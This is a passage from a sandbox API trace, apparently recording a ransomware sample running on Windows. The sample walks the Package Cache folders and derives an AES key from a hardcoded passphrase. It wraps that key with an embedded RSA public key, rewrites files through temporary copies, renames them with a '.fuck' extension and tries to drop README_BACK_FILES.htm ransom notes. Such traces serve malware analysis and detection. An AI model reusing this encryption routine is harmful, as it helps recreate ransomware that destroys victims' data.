lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.839] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.839] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.839] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.839] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.840] GetLastError () returned 0x5 [0240.840] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0240.840] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.840] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.841] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.841] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.842] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f14a8) returned 1 [0240.844] CryptCreateHash (in: hProv=0x28f14a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.844] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.844] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.844] CryptDeriveKey (in: hProv=0x28f14a8, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7878) returned 1 [0240.844] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.844] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.844] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f0cb0) returned 1 [0240.845] CryptImportPublicKeyInfo (in: hCryptProv=0x28f0cb0, dwCertEncodingType=0x1, pInfo=0x2906458*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906488*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906490*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e75b8) returned 1 [0240.845] CryptEncrypt (in: hKey=0x28e75b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.845] CryptEncrypt (in: hKey=0x28e75b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f0fe0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f0fe0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.845] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f0fe0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.845] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.845] CryptEncrypt (in: hKey=0x28e7878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.845] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.845] CloseHandle (hObject=0xffffffff) returned 1 [0240.846] CloseHandle (hObject=0xffffffff) returned 1 [0240.846] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0240.846] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.847] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg")) returned 0 [0240.847] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\cab1.cab.fuck")) returned 0 [0240.848] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.848] CryptDestroyKey (hKey=0x28e7878) returned 1 [0240.848] CryptReleaseContext (hProv=0x28f14a8, dwFlags=0x0) returned 1 [0240.848] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.848] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.848] GetLastError () returned 0x5 [0240.848] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0240.848] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0240.849] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.849] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.849] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.850] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f1420) returned 1 [0240.853] CryptCreateHash (in: hProv=0x28f1420, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.853] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.853] CryptHashData (hHash=0x28e7678, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.853] CryptDeriveKey (in: hProv=0x28f1420, Algid=0x6610, hBaseData=0x28e7678, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7878) returned 1 [0240.853] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.853] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.853] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f14a8) returned 1 [0240.853] CryptImportPublicKeyInfo (in: hCryptProv=0x28f14a8, dwCertEncodingType=0x1, pInfo=0x29058f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2905928*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2905930*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e73f8) returned 1 [0240.854] CryptEncrypt (in: hKey=0x28e73f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.854] CryptEncrypt (in: hKey=0x28e73f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1530*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f1530*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.854] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1530, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.854] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.854] CryptEncrypt (in: hKey=0x28e7878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.854] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.854] CloseHandle (hObject=0xffffffff) returned 1 [0240.854] CloseHandle (hObject=0xffffffff) returned 1 [0240.854] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), bFailIfExists=0) returned 0 [0240.855] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x0) returned 0 [0240.855] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg")) returned 0 [0240.856] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.fuck")) returned 0 [0240.856] CryptDestroyHash (hHash=0x28e7678) returned 1 [0240.856] CryptDestroyKey (hKey=0x28e7878) returned 1 [0240.856] CryptReleaseContext (hProv=0x28f1420, dwFlags=0x0) returned 1 [0240.856] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.857] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.857] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\readme_back_files.htm")) returned 0xffffffff [0240.857] AreFileApisANSI () returned 1 [0240.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28dbc20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139 [0240.857] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.858] GetLastError () returned 0x5 [0240.858] GetLastError () returned 0x5 [0240.858] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.858] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.858] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.858] AreFileApisANSI () returned 1 [0240.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.859] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.859] GetLastError () returned 0x5 [0240.859] GetLastError () returned 0x5 [0240.859] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.861] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.862] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\readme_back_files.htm")) returned 0xffffffff [0240.863] AreFileApisANSI () returned 1 [0240.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 106 [0240.863] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.863] GetLastError () returned 0x5 [0240.863] GetLastError () returned 0x5 [0240.863] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.864] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e8638 [0240.864] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.864] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.864] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e84f8 [0240.864] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.864] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.864] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8578 [0240.864] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.864] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.865] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.865] GetLastError () returned 0x5 [0240.865] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0240.865] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.865] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.866] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.867] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.867] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f26b8) returned 1 [0240.870] CryptCreateHash (in: hProv=0x28f26b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.870] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.870] CryptHashData (hHash=0x28e7238, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.870] CryptDeriveKey (in: hProv=0x28f26b8, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7ab8) returned 1 [0240.870] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.870] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.870] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f21f0) returned 1 [0240.871] CryptImportPublicKeyInfo (in: hCryptProv=0x28f21f0, dwCertEncodingType=0x1, 